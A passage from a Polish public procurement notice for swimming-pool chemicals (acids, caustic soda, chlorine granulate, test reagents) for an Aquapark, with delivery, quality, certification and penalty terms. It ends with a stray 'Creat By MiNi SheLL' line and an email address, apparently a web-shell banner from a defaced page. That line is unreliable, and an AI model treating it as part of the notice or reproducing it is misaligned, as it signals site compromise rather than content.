Zadanie 4. Compactal lub równoważny  w ilości 70 litrów środek czyszczący do basenów, rozpuszcza wapno i osady, zawiera kwas solny 10% C< 25%; kwas fosforowy 5% C<10%., usuwa osady glonowe i brązowe, które są wynikiem dużej zawartości żelaza i magnezu. 

Zadanie 5. Calcid pH Minus płyn 49%  lub równoważny w ilości 500kg preparat do obniżenia pH wody basenowej.

Zadanie 6. Kwas solny 34% w ilości 2500kg kwas chlorowodorowy.
  
Zadanie 7. Soda kaustyczna  w ilości 200kg NAOH  98,5 - 100 %. 

Zadanie 8. Ph minus- granulat w ilości 4kg. 

Zadanie 9. Chemochlor T granulat 65 lub równoważny w ilości  6kg: stabilizowany granulat chlorujący o konsystencji stałej, z zawartością chloru ok. 56%. 

Zadanie 10. Krople HANNA Instruments Free Chlorine Reagant lub równoważne w ilości 240 ml., opakowanie buteleczki po min. 20 ml.

2.	Jeżeli w opisie przedmiotu zamówienia pojawia się nazwa produktu lub producenta, albo jeżeli zapisy wyraźnie wskazują na określony produkt lub producenta Wykonawca może zawsze zaproponować preparaty równoważne. Wykazanie równoważności i spełnienie wymagań określonych przez Zamawiającego spoczywa na Wykonawcy poprzez załączenie opisów, folderów, katalogów, specyfikacji technicznej, opisów technicznych itp.
3.	Wszystkie produkty muszą być dostarczone do Zamawiającego w oryginalnie zamkniętych pojemnikach. Na wszystkich opakowaniach winien być opis w języku polskim. 
4.	Każda dostarczona partia zamówionych produktów musi mieć okres przydatności do użycia co najmniej na 6 miesięcy licząc od dnia dostarczonej partii.
5.	Przyjęte ilości towaru stanowią przewidywane, szacunkowe zapotrzebowanie w okresie obowiązywania umowy. Zamawiający zastrzega sobie prawo do zmiany ilościowej w poszczególnych asortymentach w zależności od potrzeb. Przy zmianach ilościowych obowiązują ceny jednostkowe podane w ofercie. 
6.	Wykonawcy nie przysługują roszczenia z tytułu  nie zamówienia maksymalnej planowanej ilości towaru w okresie obowiązywania umowy.
7.	Dostawę chemii basenowej należy realizować po otrzymaniu zamówienia faksem lub telefonicznego przez uprawnionego pracownika ze strony Zamawiającego. 
8.	Rozładunku dostawy, w tym wniesienia do pomieszczenia wskazanego przez Zamawiającego dokonują pracownicy Wykonawcy. 
9.	W przypadku dostawy środków nie spełniających norm jakościowych  np. zanieczyszczenia, w uszkodzonych pojemnikach  lub bez prawidłowego oznakowania, Wykonawca ma obowiązek na wniosek Zamawiającego, wymienić przedmiot dostawy w całości lub w części, nie później niż w ciągu 24 godzin, chyba że Zamawiający wyznaczy inny termin.
10.	W przypadku wątpliwości co do jakości chemii Zamawiający zleci wykonanie badań chemii w uprawnionym laboratorium. W razie stwierdzenia niezgodności z obowiązującymi normami, kosztami badania laboratoryjnego zostanie obciążony Wykonawca. 
11.	Wykonawca poniesie koszty wymiany wody w nieckach basenowych w przypadku, gdy zostanie stwierdzona niezgodność dostarczonej i użytej chemii basenowej z obowiązującymi w tym zakresie normami. 
12.	W przypadku, gdy Zamawiający zmuszony będzie do zamknięcia pływalni w Aquaparku z powodu opóźnienia w dostawie chemii basenowej, dostarczenia chemii w złej jakości niezgodnie z zamówionymi parametrami, Wykonawca zobowiązany będzie zapłacić karę umowną  w wysokości  15.000 za każdy dzień postoju Aguaparku.
13.	Zamawiający wymaga aby każdy z oferowanych produktów posiadał zgodę Państwowego Zakładu Higieny (Atest Higieniczny) na dopuszczenie do obrotu na terytorium Polski oraz kartę charakterystyki produktu. Spełnienie warunku atestu powinno być  udokumentowane w ofercie poprzez załączenie do oferty: Atestu Higienicznego i karty charakterystyki. 
14.	W okresie obowiązywania umowy Zamawiający musi posiadać aktualne atesty, pozwolenia oraz karty charakterystyki na dostarczone przez wykonawcę środki do uzdatniania wody. W przypadku utraty ich ważności lub pojawienia się nowych, istotnych informacji dotyczących środków do uzdatniania wody - Wykonawca zobowiązany jest do niezwłocznego dostarczenia aktualnych dokumentów. 
15.	Przedmiot zamówienia musi spełniać wymagania Polskich Norm przenoszących europejskie normy zharmonizowane, jednocześnie musi on być wprowadzony do obrotu zgodnie z odpowiednimi przepisami. 
16.	Transport środków do uzdatniania wody do miejsca wskazanych przez Zamawiającego musi się odbywać zgodnie z obowiązującymi przepisami prawa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.96.20.00-5, 14.43.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com